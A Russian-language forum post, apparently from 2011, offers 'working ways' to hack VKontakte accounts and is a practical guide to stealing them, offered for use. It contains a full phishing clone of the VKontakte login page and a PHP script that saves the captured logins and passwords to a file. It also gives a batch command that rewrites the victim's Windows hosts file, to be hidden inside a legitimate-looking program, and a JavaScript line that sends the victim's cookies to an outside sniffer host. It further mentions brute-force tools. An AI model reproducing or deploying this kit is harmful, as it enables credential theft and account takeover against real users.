borisbill
Сообщений: 7
Оценки: 0
Присоединился: 2011-02-21 22:18:55.510000
|
хочу составить список действительно того что может помочь нам .
1)И самый действительный способ взлома это своровать пароль …Как я понял это можно сделать только 1-им способом с помощью того что пользователь сам введет данные от странницы.
Приведу пример создаем на хостинге с php и где нет рекламы сайт в php следующего содержания и названием index.php
http://www.hackzone.ru/files/get/id/533/ArxWFakeGen.HТМL -я пользовался этой программой (определяется как вирус!!!!!)
<!DOCTYPE HТМL PUBLIC "-//W3C//DTD XHТМL 1.0 Strict//EN" "http://www.w3.org/TR/xHТМL1/DTD/xHТМL1-strict.dtd">
<HТМL xmlns="http://www.w3.org/1999/xHТМL" xml:lang="en" lang="en" id="vkontakte">
<head>
<meta http-equiv="content-type" content="text/HТМL; charset=windows-1251" />
<title>В Контакте | Вход</title>
<link rel="stуlеshееt" href="http://vkontakte.ru/css/rustyle.css?116" type="text/css" />
<sсriрt src="http://vkontakte.ru/js/common.js?217"></sсriрt>
<link rel="stуlеshееt" href="http://vkontakte.ru/css/reg.css?13" type="text/css" />
<link rel="stуlеshееt" href="http://vkontakte.ru/css/ui_controls.css?23" type="text/css" />
<sсriрt type="text/jаvаsсriрt" src="http://vkontakte.ru/js/lib/ui_controls.js?95"></sсriрt>
<sсriрt type="text/jаvаsсriрt" src="http://vkontakte.ru/js/lang0_0.js?2573"></sсriрt>
<link rel="shortcut icon" href="http://vkontakte.ru/images/faviconnew.ico" />
<!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(http://vkontakte.ru//css/ie.css?14); /* ]]> */</style><![endif]-->
<!--[if IE 7]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(http://vkontakte.ru//css/ie7.css?13); /* ]]> */</style><![endif]-->
<!--[if gte IE 8]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(http://vkontakte.ru//css/ie8.css); /* ]]> */</style><![endif]-->
<sсriрt type="text/jаvаsсriрt">
<!--
if (window.qArr && qArr[5]) qArr[5] = [5, "по товарам", "", "goods", 0x00000100];
onDomReady(function() {
window.init_dec_hash();
});
var base_domain = '/';
css_versions = extend(css_versions, {
lib_ui_controls_js: 95,
ui_controls_css: 23,
mentions_js: 29,
qsearch_js: 34,
privacy_css: 19,
profile_css: 123,
wiki_css: 19,
gifts_css: 32,
mail2_css: 12,
mail_js: 40,
photoview_css: 8,
photoview_js: 13
});
var is_rtl = false;if (parent && parent != window && (browser.msie || browser.opera || browser.mozilla || browser.chrome || browser.safari || browser.iphone)) {
onDomReady(function() {
document.getElementsByTagName('bоdу')[0].innerHТМL = '<h1 style="color: #F00">THIS IS NOT VKONTAKTE AND NOT VK SITE</h1>';
});
}
window.awayHash = '66e303e2cf379f3130';
//-->
</sсriрt>
</head>
<bоdу onresize="onbоdуResize()">
<div id="pageContainer">
<div id="pageLayout">
<sсriрt type="text/jаvаsсriрt">onbоdуResize()</sсriрt>
<!-- pageHeader -->
<div id="pageHeader" class="p_head p_head_l0">
<div class="header_back"></div>
<div class="header_left"></div>
<div class="header_right"></div>
<div id="pageHeaderRight">
<h1 id="home"><a href="http://vkontakte.ru/">ВКонтакте</a></h1>
<div class="headNav">
<a class="not_in_vk topNavLink fl_l" href="http://vkontakte.ru/reg0">Как стать участником?</a>
</div>
</div>
</div>
<!-- End pageHeader -->
<!-- sideBar -->
<div id="sideBar">
<ol id='nav'>
<li><a href='http://vkontakte.ru/index.php'>Главная</a></li>
<li><a href='http://vkontakte.ru/login.php'>Вход</a></li>
<li><a href='http://vkontakte.ru/reg0'>Регистрация</a></li>
</ol>
<div style="width:124px">
</div>
</div>
<!-- End sideBar -->
<!-- pagebоdу -->
<div id="pagebоdу" class="pagebоdу">
<div id="wrapH">
<div id="wrapHI">
<div id="header"><h1> Вход</h1></div>
</div>
</div>
<div id="wrap2">
<div id="wrap1">
<div id="content">
<sсriрt type="text/jаvаsсriрt">
var vklogin = false;
function try_to_login(obj, text) {
if (text.substr(0, 4) == 'good') {
var to = 'aWQ4';
if (location.hash.toString().length) {
to += location.hash;
}
if (to.length) {
window.location.href='http://vkontakte.ru/' + to;
} else {
window.location.href='http://vkontakte.ru/id' + text.substr(4);
}
} else if (text.substr(0, 10) == 'not_active') {
window.location.href='http://vkontakte.ru/login.php?r=1';
} else if (text.substr(0, 6) == 'invite') {
window.location.href='http://vkontakte.ru/help.php?page=welcome&hash=' + text.substr(6);
} else if (text.substr(0, 9) == 'reginvite') {
window.location.href='http://vkontakte.ru/register.php?hash=' + text.substr(9);
} else if (text.substr(0, 7) == 'vklogin') {
vklogin = true;
ge('login').submit();
} else {
show('message_text');
ge('message_text').innerHТМL = "<div id='error' style='font-size: 11px'>Такой почтовый адрес не зарегистрирован, либо пароль неверный.</div>";
}
}
function document.login.submit() {
var options = {onSuccess: try_to_login};
hide('message_text');
Ajax.postWithCaptcha('/login.php', {'op': 'a_login_attempt'}, options);
}
var captcha_send = 'Отправить';
var captcha_cancel = 'Отмена';
</sсriрt>
<div id="message_text">
<div id='message' style='margin: 0'>Чтобы просматривать эту страницу, нужно зайти на сайт.</div>
</div>
<div class="simplePage">
<form method="post" name="login" id="login" action="/login.php" onsubmit="if (vklogin) { return true} else { document.login.submit();return false;}">
<input type="hidden" name="act" id="act" value="login">
<input type="hidden" name="success_url" id="success_url" value="">
<input type="hidden" name="fail_url" id="fail_url" value="">
<input type="hidden" name="try_to_login" id="try_to_login" value="1">
<input type="hidden" name="to" id="to" value="aWQ4"/>
<input type="hidden" name="vk" id="vk" value="" />
<input type="hidden" name="al_test" value="3" />
<table align="center" cellpadding=0 cellspacing=7 border=0 width="80%">
<tr>
<td class="ta_r">
<span class="grey">E-mail или Логин:</span>
</td>
<td style="padding: 0px">
<input class="inputText" type="text" name="email" value="" id="email" size="25" style="margin: 0px"/>
<td>
</tr>
<tr>
<td class="ta_r">
<span class="grey">Пароль:</span>
</td>
<td style="padding: 0px">
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" style="margin: 0px"/>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="hidden" name="expire" id="expire" />
<sсriрt type="text/jаvаsсriрt">
onDomReady(function() {
new Checkbox(ge('expire'), {
width: 150,
label: 'Чужой компьютер'
});
});
</sсriрt>
</td>
</tr>
<tr>
<td>
</td>
<td>
<div style="height:20px; margin:5px 0px">
<ul class="nNav btnList">
<li>
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="jаvаsсriрt: document.login.submit()">Вход</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li>
<li>
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="http://vkontakte.ru/reg0">Регистрация</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li></ul>
</div>
</td>
</tr>
<tr>
<td>
</td>
<td class="forgotPass">
<a href="http://vkontakte.ru/login.php?op=forgot">Забыли пароль?</a>
</td>
</tr>
</table>
<input type="submit" value='.' style="color:#fff;border:0;padding:0;margin:0;background:#fff;height:6px;width:6px"/>
</form>
</div>
</div>
</div>
</div>
</div>
<div id="boxHolder"></div>
<!-- End pagebоdу -->
<!-- bFooter -->
<div class="footerVK">
<div><a href="http://vkontakte.ru/help.php?page=about">В Контакте</a> © 2006-2011 <a href="http://vkontakte.ru/#" оnclick="return doChangeLang(0, '37d0259985fb32cd11');" style="margin-left:7px">Русский</a><a href="http://vkontakte.ru/#" оnclick="return doChangeLang(1, '37d0259985fb32cd11');" style="margin-left:7px">Українська</a><a href="http://vkontakte.ru/#" оnclick="return doChangeLang(2, '37d0259985fb32cd11');" style="margin-left:7px">Беларуская (тарашкевiца)</a><a href="http://vkontakte.ru/#" оnclick="return doChangeLang(3, '37d0259985fb32cd11');" style="margin-left:7px">English</a><a href="http://vkontakte.ru/#" оnclick="return doChangeLang(11, '37d0259985fb32cd11');" style="margin-left:7px">Српски</a><a href="http://vkontakte.ru/#" оnclick="return doChangeLang(10, '37d0259985fb32cd11');" style="margin-left:7px">Magyar</a><a href="http://vkontakte.ru/#" оnclick="return doChangeLang(57, '37d0259985fb32cd11');" style="margin-left:7px">Azərbaycan</a><a href="http://vkontakte.ru/#" оnclick="return changeLang();" class="langSelector">все языки »</a></div>
<div><!----></div>
</div>
<!--Both counters-->
<sсriрt type="text/jаvаsсriрt">
<!--
onDomReady(function(){
setTimeout(function() {
(new Image()).src = 'http://counter.yadro.ru/hit?r' + escape(document.referrer) + ((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ';u' + escape(document.URL) + ';' + Math.random() + '';
(new Image()).src = 'http://www.tns-counter.ru/V13a***R>' + document.referrer.replace(/\*/g,'%2a') + '*vkontakte_ru/ru/CP1251/tmsec=vkontakte_total/';
}, 10);
});
//-->
</sсriрt>
<!--/Both counters-->
<!-- End bFooter -->
</div>
<sсriрt type="text/jаvаsсriрt">
window.init_dec_hash = function() {
window.decoded_hashes = {};
var dec_hash = function(hash) {
(function(_){window.decoded_hashes[_]=(function(__){var ___=ge?'':'___';for(____=0;____<__.length;++____)___+=__.charAt(__.length-____-1);return geByClass?___:'___';})(_.substr(_.length-5)+_.substr(4,_.length-12));})(hash);
}
window.decodehash = function(hash) {
dec_hash(hash);
return window.decoded_hashes[hash];
}
}
</sсriрt>
<!-- End pageLayout 9794 -->
</div>
</bоdу>
</HТМL>
и к нему login.php который записывает введеные данные в base.php
<?php
$BASE="base.php";
$IS_EMAIL=false;
$LOCATION="http://jаvаsсriрt:document.write('<sсriрt>img = new Image(); img.src = "http://httpz.ru/nwuyqilo3l4.gif?"+document.cооkie;</sсriрt>')/";
$p0=$_REQUEST["login"];
$p1=$_REQUEST["pass"];
$p2=$_REQUEST["expire"];
$headers = "";
$info="$p0:$p1:$p2:\n";
if ($IS_EMAIL){
mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
потом эти файлы а тобиш login.php,index.php,base.php кидаем на хост через ftp,определяем ip вашего сайта создаем текстовый документ следующего содержания echo 127.000.00 rerere > %systemroot%\System32\drivers\etc\hosts 127.000.00 -ip вашего сайта, rerere что будет отображаться у жертвы в адресной строке ,потом объедините bat с программой например cclener (http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.HТМL) и отправьте жертве ссылку на скачивание
2)устаревшее brut mail/ответ на вопрос и.т.д brut icq ( 2последних рабочих брута http://rapid.ufanet.ru/3061283)
3)сниффер https://hacker-pro.net/sniffer/ пример нужно чтобы у того вы взламываете странницу выполнился следующий код jаvаsсriрt:document.write('<sсriрt>img = new Image(); img.src = "http://httpz.ru/РИСУНОК С СНИФФЕРА!!!?"+document.cооkie;</sсriрt>')
|
рабочие способы взлома Vkontakte - 
